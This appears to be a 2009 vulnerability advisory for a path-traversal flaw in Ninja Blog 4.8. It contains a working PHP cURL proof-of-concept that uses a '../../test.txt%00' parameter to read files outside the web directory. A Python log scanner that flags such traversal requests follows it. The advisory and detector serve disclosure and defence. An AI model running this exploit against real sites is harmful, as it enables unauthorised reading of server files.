Ninja Blog 4.8 Remote Information Disclosure Vulnerability

ID SSV:17751
Type seebug
Reporter Root
Modified 2009-01-19T00:00:00



Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at


Due to insufficient validation of client-supplied data, we can alter the path of the file to be read so that it points to a file outside the intended directory.

The following PoC will read a file named 'test.txt' one level above the application folder.



<?php

$strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read
$strSite = ""; //Don't forget the trailing slash

//Request the entries page with the crafted 'cat' parameter and capture the response body
$objCurl = curl_init();
curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead);
curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true);

echo("Getting data...\n");
$strDump = curl_exec($objCurl);

curl_close($objCurl); //Release the cURL handle

//Show whatever the server returned
echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n");

?>


# [2009-01-19]
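
One way to look for this request pattern in web server access logs, as an added example that is not part of the original advisory: it flags requests to entries/index.php whose cat parameter decodes to a NUL byte, a '..' path segment or an absolute path, and goes slightly beyond the PoC by also normalising double percent-encoding and backslashes. The log lines, addresses and the /blog/ prefix are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Constructed sample access-log lines; addresses and the /blog/ prefix are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2009:10:00:01 +0000] "GET /blog/entries/index.php?cat=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Jan/2009:10:00:07 +0000] "GET /blog/entries/index.php?cat=../../test.txt%00 HTTP/1.1" 200 48',
    '203.0.113.9 - - [19/Jan/2009:10:00:09 +0000] "GET /blog/entries/index.php?cat=%252e%252e%252ftest.txt HTTP/1.1" 200 48',
    '203.0.113.7 - - [19/Jan/2009:10:00:12 +0000] "GET /blog/index.php?page=2 HTTP/1.1" 200 7301',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_cat(raw_value):
    """Return the reasons a 'cat' value cannot be a plain category name."""
    value = fully_decode(raw_value).replace("\\", "/")
    reasons = []
    if "\x00" in value:
        reasons.append("nul-byte")          # the trailing %00 in the PoC
    if ".." in value.split("/"):
        reasons.append("dot-dot-segment")   # the ../../ in the PoC
    if value.startswith("/"):
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Return [(line_number, reasons)] for flagged requests to entries/index.php."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith("/entries/index.php"):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_cat(value) if key == "cat" else []
            if reasons:
                findings.append((number, reasons))
    return findings

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```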